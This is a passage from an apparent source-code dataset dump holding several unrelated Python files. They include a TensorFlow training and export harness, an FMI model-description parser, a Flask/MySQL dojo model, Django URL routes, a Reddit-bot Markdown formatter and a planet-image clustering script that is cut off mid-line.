sess.run(self.dataset.initializer(),\n feed_dict={self.seed: epoch_i})\n\n self.onEpochBegin(sess, epoch_i)\n\n train_cost, train_points = self._epoch_train_step(sess, epoch_i)\n final_cost_train.append((epoch_i, train_cost))\n print(\"final train cost: %f\" % train_cost)\n\n dev_cost, dev_points = self._epoch_dev_step(sess, epoch_i)\n final_cost_dev.append((epoch_i, dev_cost))\n print(\"final dev cost: %f\" % dev_cost)\n\n self._write_cost_graph(\"%03d\" % epoch_i, train_points, dev_points)\n\n self.saver.save(sess, self.settings['checkpointFile'],\n global_step=epoch_i)\n\n self.onEpochEnd(sess, epoch_i)\n\n # write a final graph showing cost as a function of epoch\n self._write_cost_graph(\"final\", final_cost_train, final_cost_dev)\n\n def _epoch_train_step(self, sess, epoch_i):\n \"\"\"\n train a single epoch\n train 
on all available samples, periodically print the\n training cost\n \"\"\"\n\n epoch_cost = []\n step = 0\n total_cost = 0\n while True:\n try:\n # train on a single batch\n # record the value loss/cost function\n _, cost = sess.run([self.train_op,\n self.train_ops['cost']])\n total_cost += cost\n step += 1\n\n # periodically print out the cost\n # TODO: consider printing out every 15 seconds\n update_period = int(500 / self.settings['batch_size'])\n\n x = step * self.settings['batch_size']\n if step % update_period == 0:\n y = total_cost / x\n msg = \"%2d: step: %5d cost: %.7f\"\n print(msg % (epoch_i, step, total_cost / x))\n epoch_cost.append((x, y))\n\n if self.settings['max_steps'] > 0 and \\\n step > self.settings['max_steps']:\n break\n except tf.errors.OutOfRangeError:\n break\n\n mean_cost = total_cost / (step * self.settings['batch_size'])\n return mean_cost, epoch_cost\n\n def _epoch_dev_step(self, sess, epoch_i):\n\n epoch_cost = []\n step = 0\n total_cost = 0\n while True:\n try:\n cost = sess.run(self.dev_ops['cost'])\n total_cost += cost\n step += 1\n\n update_period = int(500 / self.settings['batch_size'])\n if step % update_period == 0:\n\n x = step * self.settings['batch_size']\n y = total_cost / x\n epoch_cost.append((x, y))\n\n sys.stdout.write(\".\")\n sys.stdout.flush()\n\n break;\n except tf.errors.OutOfRangeError:\n break\n sys.stdout.write(\"\\n\")\n\n x = step * self.settings['batch_size']\n msg = \"%2d: dev: step: %5d cost: %.7f\"\n print(msg % (epoch_i, step, total_cost / x))\n\n mean_cost = total_cost / (step * self.settings['batch_size'])\n return mean_cost, epoch_cost\n\n def _write_cost_graph(self, tag, points_train, points_dev):\n \"\"\"\n save a json file containing the points for plotting two graphs\n points should be an array of (x,y) pairs\n \"\"\"\n jo = {\n \"mode\": \"multiline\",\n \"data\": {\"train\": points_train, \"dev\": points_dev},\n \"xlabel\": \"#Samples\",\n \"ylabel\": \"Cost\",\n \"title\": \"Train Cost for Epoch %s\" % tag,\n }\n\n path = os.path.join(self.settings['outputDir'],\n \"epoch_cost_%s.json\" % tag)\n\n with open(path, \"w\") as wf:\n json.dump(jo, wf, sort_keys=True, indent=2)\n\n def export(self, ckpt=None):\n \"\"\"\n\n \"\"\"\n\n frozen_name = \"frozen_model\"\n\n tr_ckpt = ckpt or tf.train.latest_checkpoint(self.settings['outputDir'])\n\n logging.info(\"Exporting model using %s\" % tr_ckpt)\n\n tf.reset_default_graph()\n\n evalOutputDir = os.path.join(self.settings['outputDir'], 'eval')\n\n if not os.path.exists(evalOutputDir):\n os.makedirs(evalOutputDir)\n\n init_op = tf.group(tf.global_variables_initializer(),\n tf.local_variables_initializer(), name=\"INIT\")\n\n batch_size = 1 # TODO, can this be None or -1 for arbitrary?\n shape = self.dataset.shape(batch_size, flat=True)\n featEval = tf.placeholder(tf.float32, shape, name='INPUT')\n shape = [self.settings['nClasses']]\n labelEval = tf.placeholder(tf.float32, shape, name='INPUT_LABEL')\n eval_ops = self.model_fn(featEval, labelEval, reuse=False, isTraining=False)\n\n assert eval_ops['x'] is featEval\n assert eval_ops['y'] is labelEval\n # -------------------------------------------------------------------------\n # Export model\n # -------------------------------------------------------------------------\n saver = tf.train.Saver()\n modelFile = 'model.pbtxt'\n modelPath = os.path.join(evalOutputDir, modelFile)\n frozenModelPath = os.path.join(evalOutputDir, \"%s.pb\" % frozen_name)\n\n model_ckpt = os.path.join(evalOutputDir, 'model.ckpt')\n with tf.Session() as 
sess:\n sess.run(init_op)\n\n saver.restore(sess, tr_ckpt)\n\n saver.save(sess, model_ckpt,\n write_meta_graph=False)\n\n tf.train.write_graph(\n sess.graph.as_graph_def(),\n evalOutputDir,\n modelFile,\n as_text=True\n )\n\n export_ops = list(eval_ops.values())\n export_ops.insert(0, init_op)\n print(export_ops)\n export_names = ','.join([op.name.split(\":\")[0] for op in export_ops])\n\n # get the actual file path of the frozen checkpoint\n frozen_ckpt = tf.train.latest_checkpoint(evalOutputDir)\n print(\"-\" * 60)\n print(\"path: %s\" % modelPath)\n print(\"path: %s\" % frozenModelPath)\n print(\"freeze: %s\" % export_names)\n print(\"checkpoint: %s\" % frozen_ckpt)\n print(\"-\" * 60)\n\n path = os.path.join(evalOutputDir,\n \"%s.json\" % frozen_name)\n\n tensors = {name: op.name for name, op in eval_ops.items()}\n ops = {'init': init_op.name, }\n jo = {\n \"checkpoint\": tr_ckpt,\n \"tensors\": tensors,\n \"operations\": ops,\n \"shape\": self.dataset.shape(batch_size, flat=False),\n \"dataset\": self.dataset.exportConfig()\n }\n with open(path, \"w\") as wf:\n json.dump(jo, wf, sort_keys=True, indent=2)\n\n # freeze weights along with the graph, so that it can be used\n # with the C API\n freeze(modelPath, frozenModelPath, frozen_ckpt, export_names)\n\n def onEpochBegin(self, sess, index):\n pass\n\n def onEpochEnd(self, sess, index):\n pass\n\n def onTrainStart(self, sess):\n pass\n\n def onTrainEnd(self, sess):\n pass\n\n def run(self, settings, dataset):\n\n self.makeGraph(settings, dataset)\n\n do_export = True\n\n self.beforeSession()\n with tf.Session() as sess:\n\n self.onTrainStart(sess)\n\n if self.checkpointExists():\n self.restore(sess)\n else:\n self.train(sess)\n do_export = True\n\n self.onTrainEnd(sess)\n\n if do_export:\n self.export()\n\nclass EncoderTrainer(TrainerBase):\n\n def __init__(self, model_fn):\n super(EncoderTrainer, self).__init__()\n\n self.model_fn = model_fn\n\n def makeGraph(self, settings, dataset):\n\n self.settings = settings\n self.dataset = dataset\n\n self.seed = tf.placeholder(tf.int64, shape=tuple(), name=\"seed\")\n\n logging.info(\"create training graph\")\n featTrain, labelTrain, uidTrain = dataset.getTrain(settings['batch_size'], self.seed)\n self.train_ops = self.model_fn(featTrain, labelTrain,\n reuse=False, isTraining=True)\n\n logging.info(\"create dev graph\")\n featDev, labelDev, uidDev = dataset.getDev(settings['batch_size'], self.seed)\n self.dev_ops = self.model_fn(featDev, labelDev,\n reuse=True, isTraining=False)\n\n logging.info(\"create test graph\")\n featTest, labelTest, uidTest = dataset.getTest()\n self.test_ops = self.model_fn(featTest, labelTest,\n reuse=True, isTraining=False)\n\n logging.info(\"create optimizer: adam\")\n self.global_step = tf.Variable(0, name='global_step', trainable=False)\n self.optimizer = tf.train.AdamOptimizer(settings['learning_rate'])\n self.train_op = self.optimizer.minimize(self.train_ops['cost'],\n global_step=self.global_step)\n\n def project(self, sess):\n\n logging.info(\"Creating projection\")\n\n self.settings['projectDir'] = os.path.join(self.settings['outputDir'], 'projector')\n self.settings['projectModel'] = os.path.join(self.settings['projectDir'], 'projector.ckpt')\n\n if not os.path.exists(self.settings['projectDir']):\n os.makedirs(self.settings['projectDir'])\n\n featTest, labelTest, uidTest = self.dataset.getTest()\n\n sess.run(self.dataset.initializer(),\n feed_dict={self.seed: 0})\n\n embed_op = [self.test_ops['z'], labelTest, uidTest]\n embedded_data = []\n embedded_labels 
= []\n for i in range(self.settings['n_test_samples']):\n try:\n data, label, uid = sess.run(embed_op)\n # some data sets may not define a uid\n if uid.size > 0:\n label = uid[0][0].decode(\"utf-8\")\n else:\n label = self.dataset.oneHot2Label(label[0])\n embedded_data.append(data.reshape([-1, self.settings['dimensions'][-1]]))\n embedded_labels.append(uid)\n except tf.errors.OutOfRangeError:\n break\n\n # generate metadata file\n path_metadata = os.path.abspath(\n os.path.join(self.settings['projectDir'], 'metadata.tsv'))\n\n with open(path_metadata, 'w') as f:\n for label in embedded_labels:\n f.write('%s\\n' % label)\n\n # Input set for Embedded TensorBoard visualization\n # Performed with cpu to conserve memory and processing power\n with tf.device(\"/cpu:0\"):\n\n # shape must be 2d for tensorboard to parse correctly...\n # TODO: set second dimension correctly\n # TODO: i should not need this reshape if the stack is correct\n stack = tf.stack(np.asarray(embedded_data).reshape([-1, self.settings['dimensions'][-1]]),\n axis=0)\n\n print(\"stack shape\", stack.shape)\n\n embedding = tf.Variable(stack, trainable=False,\n name='embedding')\n\n # saver is required to be created heer...\n saver = tf.train.Saver(max_to_keep=None)\n sess.run(tf.global_variables_initializer())\n\n writer = tf.summary.FileWriter(self.settings['projectDir'], sess.graph)\n\n # Add embedding tensorboard visualization. Need tensorflow version\n # >= 0.12.0RC0\n config = projector.ProjectorConfig()\n embed = config.embeddings.add()\n embed.tensor_name = 'embedding:0'\n # todo: this should be an absolute path\n embed.metadata_path = path_metadata\n #embed.sprite.image_path = os.path.join(FLAGS.data_dir + '/mnist_10k_sprite.png')\n\n # Specify the width and height of a single thumbnail.\n #embed.sprite.single_image_dim.extend([28, 28])\n projector.visualize_embeddings(writer, config)\n\n # We save the embeddings for TensorBoard, setting the global step as\n # The number of data examples\n saver.save(sess, os.path.join(self.settings['projectDir'],\n 'a_model.ckpt'),\n global_step=self.settings['n_test_samples'])\n\n def sample(self, sess, uid=0):\n\n logging.info(\"Creating sample image\")\n\n _, width, height = self.dataset.shape(1)\n\n n = 8\n canvas_orig = np.empty((width * n, height * n))\n canvas_recon = np.empty((width * n, height * n))\n\n featTest, labelTest, _ = self.dataset.getTest()\n\n sess.run(self.dataset.initializer(),\n feed_dict={self.seed: 0})\n\n for i in range(n):\n for j in range(n):\n # Encode and decode the digit image\n feat, dec = sess.run([featTest, self.test_ops['y']])\n\n feat_max = feat.max()\n feat_min = feat.min()\n feat = feat.reshape([width, height])\n #feat = AutomaticScale(feat)\n\n dec_max = dec.max()\n dec_min = dec.min()\n dec = dec.reshape([width, height])\n #dec = AutomaticScale(dec)\n\n x1 = i * width\n x2 = (i + 1) * width\n y1 = j * height\n y2 = (j + 1) * height\n # Draw the original digits\n canvas_orig[x1:x2, y1:y2] = feat\n\n # Draw the reconstructed digits\n canvas_recon[x1:x2, y1:y2] = dec\n\n print(feat_min, feat_max, dec_min, dec_max)\n\n print(\"Original Images\")\n plt.figure(figsize=(n, n))\n plt.imshow(canvas_orig, origin=\"upper\", cmap=\"gray\")\n plt.savefig(os.path.join(self.settings['outputDir'], \"img_%02d_original.png\" % uid))\n\n print(\"Reconstructed Images\")\n plt.figure(figsize=(n, n))\n plt.imshow(canvas_recon, origin=\"upper\", cmap=\"gray\")\n plt.savefig(os.path.join(self.settings['outputDir'], \"img_%02d_reconstructed.png\" % uid))\n\n def 
onEpochEnd(self, sess, index):\n self.sample(sess, index)\n\n def onTrainEnd(self, sess):\n self.project(sess)\n\nclass ClassifierTrainer(TrainerBase):\n\n def __init__(self, model_fn):\n super(ClassifierTrainer, self).__init__()\n\n self.model_fn = model_fn\n\n def makeGraph(self, settings, dataset):\n\n self.settings = settings\n self.dataset = dataset\n\n self.seed = tf.placeholder(tf.int64, shape=tuple(), name=\"seed\")\n\n logging.info(\"create training graph\")\n featTrain, labelTrain, uidTrain = dataset.getTrain(settings['batch_size'], self.seed)\n self.train_ops = self.model_fn(featTrain, labelTrain,\n reuse=False, isTraining=True)\n\n logging.info(\"create dev graph\")\n featDev, labelDev, uidDev = dataset.getDev(settings['batch_size'], self.seed)\n self.dev_ops = self.model_fn(featDev, labelDev,\n reuse=True, isTraining=False)\n\n metrics_file = os.path.join(settings['outputDir'], \"metrics.txt\")\n self.dev_metrics = ClassificationMetricsCalculator(\n metrics_file, settings['nClasses'],\n dataset.iterDev.initializer, self.dev_ops['logits'],\n labelDev, seed=self.seed)\n\n logging.info(\"create test graph\")\n featTest, labelTest, uidTest = dataset.getTest()\n self.test_ops = self.model_fn(featTest, labelTest,\n reuse=True, isTraining=False)\n\n self.test_metrics = ClassificationMetricsCalculator(\n metrics_file, settings['nClasses'],\n dataset.iterTest.initializer, self.test_ops['logits'],\n labelTest)\n\n logging.info(\"create optimizer: adam\")\n self.global_step = tf.Variable(0, name='global_step', trainable=False)\n self.optimizer = tf.train.AdamOptimizer(settings['learning_rate'])\n self.train_op = self.optimizer.minimize(self.train_ops['cost'],\n global_step=self.global_step)\n\n def onEpochEnd(self, sess, index):\n # self.dev_metrics.run(sess)\n pass\n\n def onTrainEnd(self, sess):\n # self.test_metrics.run(sess)\n pass\n\ndef run_experiment(settings, dataset, Trainer, model, keys):\n\n settings['nClasses'] = len(settings['classes'])\n settings['checkpointFile'] = os.path.join(settings['outputDir'],\n 'model.ckpt')\n\n _, settings['nFeatures'], settings['nSlices'] = dataset.shape(None,\n flat=False)\n\n if os.path.exists(settings['outputDir']):\n if input(\"delete experiment? 
(y/N): \").lower().startswith(\"y\"):\n shutil.rmtree(settings['outputDir'])\n\n cfg = {k: settings[k] for k in keys}\n model_fn = model(**cfg)\n trainer = Trainer(model_fn)\n trainer.run(settings, dataset)\n\ndef expr_audio_classification():\n\n logging.basicConfig(level=logging.INFO)\n\n cfg = AutoEncoderConfig()\n cfg.load(\"./config/audio_10way.cfg\")\n\n settings = {\n \"dataDir\": os.path.abspath(\"./data\"),\n \"outputDir\": os.path.abspath(\"./build/experiment\"),\n \"modelFile\": \"model.pb\",\n \"classes\": cfg.getGenres(),\n \"learning_rate\": 0.001,\n \"nEpochs\": 1,\n \"batch_size\": 50,\n \"max_steps\": 20,\n \"n_test_samples\": 5000,\n }\n\n dataset = AudioDataset(cfg)\n\n model = cnn\n\n if model is lstm2:\n keys = ['nClasses', 'batch_size', 'nFeatures', 'nSlices']\n elif model is cnn:\n keys = ['batch_size', 'nFeatures', 'nSlices']\n\n run_experiment(settings, dataset, ClassifierTrainer, model, keys)\n\ndef expr_mnist_classification():\n\n settings = {\n \"dataDir\": os.path.abspath(\"./build/data\"),\n \"outputDir\": os.path.abspath(\"./build/experiment\"),\n \"modelFile\": \"model.pb\",\n \"classes\": list(range(10)), # [4,9],\n \"learning_rate\": 0.001,\n \"nEpochs\": 1,\n \"batch_size\": 100,\n \"max_steps\": 50,\n \"n_test_samples\": 2500,\n }\n\n dataset = MnistDataset(settings['dataDir'], settings['classes'])\n\n #keys = ['nClasses', 'nFeatures']\n keys = ['batch_size', 'nFeatures', 'nSlices']\n run_experiment(settings, dataset, ClassifierTrainer, cnn, keys)\n\ndef expr_mnist_encoder():\n\n settings = {\n \"dataDir\": os.path.abspath(\"./build/data\"),\n \"outputDir\": os.path.abspath(\"./build/experiment\"),\n \"modelFile\": \"model.pb\",\n \"classes\": list(range(10)), # [4,9],\n \"learning_rate\": 0.01,\n \"nEpochs\": 1,\n \"batch_size\": 100,\n \"max_steps\": 0,\n \"n_test_samples\": 5000,\n }\n\n dataset = MnistDataset(settings['dataDir'], settings['classes'])\n\n _, nFeatures = dataset.shape(None, flat=True)\n settings['dimensions'] = [nFeatures, 256, 128]\n keys = ['dimensions']\n run_experiment(settings, dataset, EncoderTrainer, autoencoder, keys)\n\ndef main():\n # arguments may be: init clean build export\n # maybe this *should* be called from an experiment directory?\n expr_audio_classification()\n\nif __name__ == '__main__':\n main()","sub_path":"mlf/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":25795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"301621400","text":"from lxml import etree\r\nimport zipfile\r\nimport os\r\n\r\nclass ModelDescription(object):\r\n\r\n def __init__(self):\r\n self.guid = None\r\n self.fmiVersion = None\r\n self.modelName = None\r\n self.description = None\r\n self.generationTool = None\r\n self.generationDateAndTime = None\r\n self.variableNamingConvention = None\r\n self.numberOfContinuousStates = None\r\n self.numberOfEventIndicators = None\r\n\r\n self.defaultExperiment = None\r\n\r\n self.coSimulation = None\r\n self.modelExchange = None\r\n\r\n self.modelVariables = []\r\n\r\n\r\nclass DefaultExperiment(object):\r\n\r\n def __init__(self):\r\n self.startTime = None\r\n self.stopTime = None\r\n self.tolerance = None\r\n\r\n\r\nclass CoSimulation(object):\r\n\r\n def __init__(self):\r\n self.modelIdentifier = None\r\n\r\n\r\nclass ModelExchange(object):\r\n\r\n def __init__(self):\r\n self.modelIdentifier = None\r\n\r\n\r\nclass ScalarVariable(object):\r\n\r\n def __init__(self, name, valueReference):\r\n self.name = name\r\n 
self.valueReference = valueReference\r\n self.description = None\r\n self.type = None\r\n self.start = None\r\n self.causality = None\r\n self.variability = None\r\n\r\n def __repr__(self):\r\n return '%s \"%s\"' % (self.type, self.name)\r\n\r\n\r\ndef read_model_description(filename, validate=True):\r\n\r\n with zipfile.ZipFile(filename, 'r') as zf:\r\n xml = zf.open('modelDescription.xml')\r\n tree = etree.parse(xml)\r\n\r\n root = tree.getroot()\r\n\r\n fmiVersion = root.get('fmiVersion')\r\n\r\n if not fmiVersion in ['1.0', '2.0']:\r\n raise Exception(\"Unsupported FMI version: %s\" % fmiVersion)\r\n\r\n if validate:\r\n\r\n module_dir, _ = os.path.split(__file__)\r\n\r\n if fmiVersion == '1.0':\r\n schema = etree.XMLSchema(file=os.path.join(module_dir, 'schema', 'fmi1', 'fmiModelDescription.xsd'))\r\n else:\r\n schema = etree.XMLSchema(file=os.path.join(module_dir, 'schema', 'fmi2', 'fmi2ModelDescription.xsd'))\r\n\r\n if not schema.validate(root):\r\n message = \"Failed to validate modelDescription.xml:\"\r\n for entry in schema.error_log:\r\n message += \"\\n%s (line %d, column %d): %s\" % (entry.level_name, entry.line, entry.column, entry.message)\r\n raise Exception(message)\r\n\r\n modelDescription = ModelDescription()\r\n modelDescription.fmiVersion = fmiVersion\r\n modelDescription.guid = root.get('guid')\r\n modelDescription.modelName = root.get('modelName')\r\n modelDescription.description = root.get('description')\r\n modelDescription.generationTool = root.get('generationTool')\r\n modelDescription.generationDateAndTime = root.get('generationDateAndTime')\r\n modelDescription.variableNamingConvention = root.get('variableNamingConvention')\r\n\r\n if root.get('numberOfEventIndicators') is not None:\r\n modelDescription.numberOfEventIndicators = int(root.get('numberOfEventIndicators'))\r\n\r\n if modelDescription.fmiVersion == '1.0':\r\n modelDescription.numberOfContinuousStates = int(root.get('numberOfContinuousStates'))\r\n else:\r\n modelDescription.numberOfContinuousStates = len(root.findall('ModelStructure/Derivatives/Unknown'))\r\n\r\n defaultExperiment = root.find('DefaultExperiment')\r\n\r\n if defaultExperiment is not None:\r\n\r\n modelDescription.defaultExperiment = DefaultExperiment()\r\n\r\n startTime = defaultExperiment.get('startTime')\r\n if startTime is not None:\r\n modelDescription.defaultExperiment.startTime = float(startTime)\r\n\r\n stopTime = defaultExperiment.get('stopTime')\r\n if stopTime is not None:\r\n modelDescription.defaultExperiment.stopTime = float(stopTime)\r\n\r\n tolerance = defaultExperiment.get('tolerance')\r\n if tolerance is not None:\r\n modelDescription.defaultExperiment.tolerance = float(tolerance)\r\n\r\n if modelDescription.fmiVersion == \"1.0\":\r\n\r\n modelIdentifier = root.get('modelIdentifier')\r\n\r\n if root.find('Implementation') is not None:\r\n modelDescription.coSimulation = CoSimulation()\r\n modelDescription.coSimulation.modelIdentifier = modelIdentifier\r\n else:\r\n modelDescription.modelExchange = ModelExchange()\r\n modelDescription.modelExchange.modelIdentifier = modelIdentifier\r\n\r\n else:\r\n\r\n me = root.find('ModelExchange')\r\n\r\n if me is not None:\r\n modelDescription.modelExchange = ModelExchange()\r\n modelDescription.modelExchange.modelIdentifier = me.get('modelIdentifier')\r\n\r\n cs = root.find('CoSimulation')\r\n\r\n if cs is not None:\r\n modelDescription.coSimulation = CoSimulation()\r\n modelDescription.coSimulation.modelIdentifier = cs.get('modelIdentifier')\r\n\r\n\r\n modelVariables = 
root.find('ModelVariables')\r\n\r\n for variable in modelVariables:\r\n\r\n if variable.get(\"name\") is None:\r\n continue\r\n\r\n sv = ScalarVariable(name=variable.get('name'), valueReference=int(variable.get('valueReference')))\r\n sv.description = variable.get('description')\r\n sv.start = variable.get('start')\r\n sv.causality = variable.get('causality')\r\n\r\n value = next(variable.iterchildren())\r\n sv.type = value.tag\r\n start = value.get('start')\r\n\r\n if start is not None:\r\n if sv.type == 'Real':\r\n sv.start = float(start)\r\n elif sv.type == 'Integer':\r\n sv.start = int(start)\r\n elif sv.type == 'Boolean':\r\n sv.start = start == 'true'\r\n else:\r\n sv.start = start\r\n\r\n modelDescription.modelVariables.append(sv)\r\n\r\n\r\n return modelDescription\r\n","sub_path":"fmpy/model_description.py","file_name":"model_description.py","file_ext":"py","file_size_in_byte":5789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"570906490","text":"from scipy.misc import imread, imsave\n\ndef xor_img(img1, img2):\n out_img = img1\n for line in xrange(len(img1)):\n for pixel in xrange(len(img1[line])):\n for color in xrange(3):\n out_img = (int(img1[line][pixel][color]) ^ int(img2[line][pixel][color])) % 256\n\n return out_img\n\nimg1 = imread(\"img.jpg\")\nimg2 = imread(\"new_img.jpg\")\nnew_img = xor_img(img1, img2)\nimsave(\"fuckthis.jpg\", new_img)","sub_path":"Functions/xor_img.py","file_name":"xor_img.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"604355590","text":"from django.conf.urls import patterns, include, url\r\n# from views import Index\r\nfrom .views import main, signup, signin, logout\r\n\r\nurlpatterns = patterns('',\r\n url(r'^$', main, name=\"index\"),\r\n url(r'^signup$', signup, name=\"signup\"),\r\n url(r'^signin$', signin, name=\"signin\"),\r\n url(r'^logout$', logout, name=\"logout\"),\r\n)\r\n","sub_path":"LoginPrueba/apps/login_start/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"216635001","text":"from flask_app.config.mysqlconnection import connectToMySQL\nfrom .ninjas import Ninjas\n\n\nclass Dojos:\n def __init__( self , data ):\n self.id = data['id']\n self.name = data['name']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n self.ninjas = []\n\n @classmethod\n def get_all(cls):\n query = \"SELECT * FROM dojos;\"\n results = connectToMySQL('dojos_and_ninjas_schema').query_db(query)\n dojos = []\n for dojo in results:\n dojos.append (cls(dojo) )\n return dojos\n\n @classmethod\n def add_dojo(cls, data):\n query = \"INSERT INTO dojos (name, created_at, updated_at) VALUES (%(name)s, NOW(), NOW() )\"\n connectToMySQL('dojos_and_ninjas_schema').query_db(query, data)\n\n @classmethod\n def single_dojo(cls, data):\n query = \"SELECT * FROM dojos LEFT JOIN ninjas ON dojos.id = ninjas.dojo_id WHERE dojo_id = %(dojo_id)s ;\"\n results = connectToMySQL('dojos_and_ninjas_schema').query_db(query, data)\n print (results)\n dojo = cls(results[-1])\n for row in results:\n ninja = {\n 'id' :row['id'],\n 'first_name' :row['first_name'],\n 'last_name' :row ['last_name'],\n 'age' :row ['age'],\n 'created_at' :row['ninjas.created_at'],\n 'updated_at' :row['ninjas.updated_at']\n }\n dojo.ninjas.append(Ninjas(ninja))\n return dojo\n\n 
\n\n\n","sub_path":"flask_mysql/crud/dojos_and_ninjas_crud_mod/flask_app/models/dojos.py","file_name":"dojos.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"387474872","text":"from unittest import TestCase\n\nfrom gasopt import datamgr, modelsmgr\nfrom gasopt.data_load import furn_optimization_data_process\nfrom gasopt.furnace_interface import furnace_optimization\n\n\nclass TestOptimization(TestCase):\n def __init__(self, *args, **kwargs):\n super(TestOptimization, self).__init__(*args, **kwargs)\n\n def test_prediction(self):\n # Open the dataframe with the historical data\n G = furn_optimization_data_process('../../examples/test-slab-input-furn1.csv')\n\n # Get the recommended gas settings for the zones of furnace 1 for each slab\n F = furnace_optimization(G, furn_id=1)\n\n print(F)\n print(F.info())\n\n self.assertEqual(len(F), 10, \"Optimization did not work\")\n\n F.to_csv('../../examples/REPORTS/optimization_report.csv', ';')\n print(\"Generating the optimization report\")\n\n","sub_path":"gasopt/tests/test_optimization.py","file_name":"test_optimization.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"478439728","text":"SEARCH_RESULT_FORMAT = ('{title} | {author} | {last_updated} '\n '| {downloads:,d} | {versions}')\nCOMMENT_FORMAT = '''###LinkMod:\n\nTitle | Author | Last updated | Downloads | Versions\n:---|:---|:---|:---|:---\n{0}\n\n*****\n\n^Bleep ^bloop, ^I'm ^a ^bot ^that ^links ^Factorio ^mods. ^| \\\n^Usage: ^(`linkmods: Squeak Through`) ^| \\\n^[GitHub](https://github.com/Sparta142/factorio-mod-portal-bot)\n'''\n\n# Markdown formatting characters to escape in hyperlinks, etc\nESCAPED_CHARACTERS = '\\\\`*_{}[]()#+-.!'\n\n\ndef escape(s):\n \"\"\"\n Backslash-escape most Markdown formatting characters\n in a given string.\n\n :param s: the Markdown string to escape\n :return: the escaped string\n \"\"\"\n return ''.join('\\\\' + ch if ch in ESCAPED_CHARACTERS else ch for ch in s)\n\n\ndef hyperlink(text, url):\n \"\"\"\n Format a hyperlink with the specified text,\n escaping any problem characters as required.\n\n :param text: the text that should appear in place of the URL\n :param url: the url to link to\n :return: the Markdown-formatted link\n \"\"\"\n return '[{}]({})'.format(escape(text), escape(url))\n\n\ndef format_search_result(result):\n \"\"\"\n Format a single SearchResult in Markdown.\n\n :param result: the search result to format\n :return: the formatted result\n \"\"\"\n return SEARCH_RESULT_FORMAT.format(\n title=hyperlink(result.title, result.link),\n author=hyperlink(result.author, result.author_link),\n downloads=result.downloads,\n last_updated=result.last_updated,\n versions=result.versions\n )\n\n\ndef format_comment(search_results):\n \"\"\"\n Format a list of SearchResults in Markdown as a Reddit comment.\n\n :param search_results: the search results to format with\n :return: the formatted comment\n \"\"\"\n results_str = '\\n'.join(format_search_result(r) for r in search_results)\n return COMMENT_FORMAT.format(results_str)\n","sub_path":"bot/markdown.py","file_name":"markdown.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"389200688","text":"\"\"\"This script requires you to launch a local ipcontroller. 
If you execute this\nlocally, do it with `ipcluster start`.\n\"\"\"\nfrom IPython.parallel import Client\nfrom IPython.parallel.util import interactive\nimport argparse\nfrom .p4io import get_image_names_from_db\nimport logging\n\nlogging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)\n\n\n@interactive\ndef do_clustering(p4img, kind='fans'):\n from planet4 import clustering\n import pandas as pd\n\n reduced = clustering.perform_dbscan(p4img, kind)\n if reduced is None:\n return None\n series = [cluster.data for cluster in reduced]\n n_members = [cluster.n_members for cluster in reduced]\n n_rejected = [cluster.n_rejected for cluster in reduced]\n df = pd.DataFrame(series)\n df['image_id'] = p4img.imgid\n df['n_members'] = n_members\n df['n_rejected'] = n_rejected\n return df\n\n\n@interactive\ndef process_image_name(image_name):\n from os.path import join as pjoin\n import os\n import pandas as pd\n from planet4 import markings\n HOME = os.environ['HOME']\n\n dirname = pjoin(HOME, 'data/planet4/catalog_2_and_3')\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n blotchfname = pjoin(dirname, image_name + '_reduced_blotches.hdf')\n fanfname = pjoin(dirname, image_name + '_reduced_fans.hdf')\n if os.path.exists(blotchfname) and\\\n os.path.exists(fanfname):\n return image_name + ' already done.'\n data = pd.read_hdf(dbfile, 'df', where=\"image_name=\" + image_name)\n img_ids = data.image_id.unique()\n blotches = []\n fans = []\n for img_id in img_ids:\n p4img = markings.ImageID(img_id)\n blotches.append(do_clustering(p4img, 'blotches'))\n fans.append(do_clustering(p4img, 'fans'))\n blotches = pd.concat(blotches, ignore_index=True)\n blotches.to_hdf(blotchfname, 'df')\n fans = pd.concat(fans, ignore_index=True)\n fans.to_hdf(fanfname, 'df')\n return image_name\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('db_fname',\n help=\"Provide the filename of the HDF database \"\n \"file here.\")\n args = parser.parse_args()\n\n image_names = get_image_names_from_db(args.db_fname)\n logging.info('Found {} image_names'.format(len(image_names)))\n\n c = Client()\n dview = c.direct_view()\n lbview = c.load_balanced_view()\n\n dview.push({'do_clustering': do_clustering,\n 'dbfile': args.db_fname})\n results = lbview.map_async(process_image_name, image_names)\n import time\n import sys\n import os\n dirname = os.path.join(os.environ['HOME'], 'data/planet4/catalog_2_and_3')\n while not results.ready():\n print(\"{:.1f} %\".format(100 * results.progress / len(image_names)))\n sys.stdout.flush()\n time.sleep(10)\n for res in results.result:\n print(res)\n logging.info('Catalog production done. 
